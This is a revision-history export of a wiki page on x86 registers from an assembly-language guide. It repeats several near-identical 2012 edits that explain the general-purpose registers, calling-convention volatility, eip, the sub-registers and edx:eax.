esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the bottom of the stack (the stack grows towards lower addresses). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores a pointer to the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3155Registers2012-01-16T03:15:59Z<p>Killboy: /* 16-bit and 8-bit Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the bottom of the stack (the stack grows towards lower addresses). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning and they are used to store meta-information about the results of previous operations. For example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations which will commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores a pointer to the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3154Registers2012-01-16T03:15:28Z<p>Killboy: </p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the bottom of the stack (the stack grows towards lower addresses). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning and they are used to store meta-information about the results of previous operations. For example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations which will commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3153Registers2012-01-16T03:14:17Z<p>Killboy: /* 64-bit Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
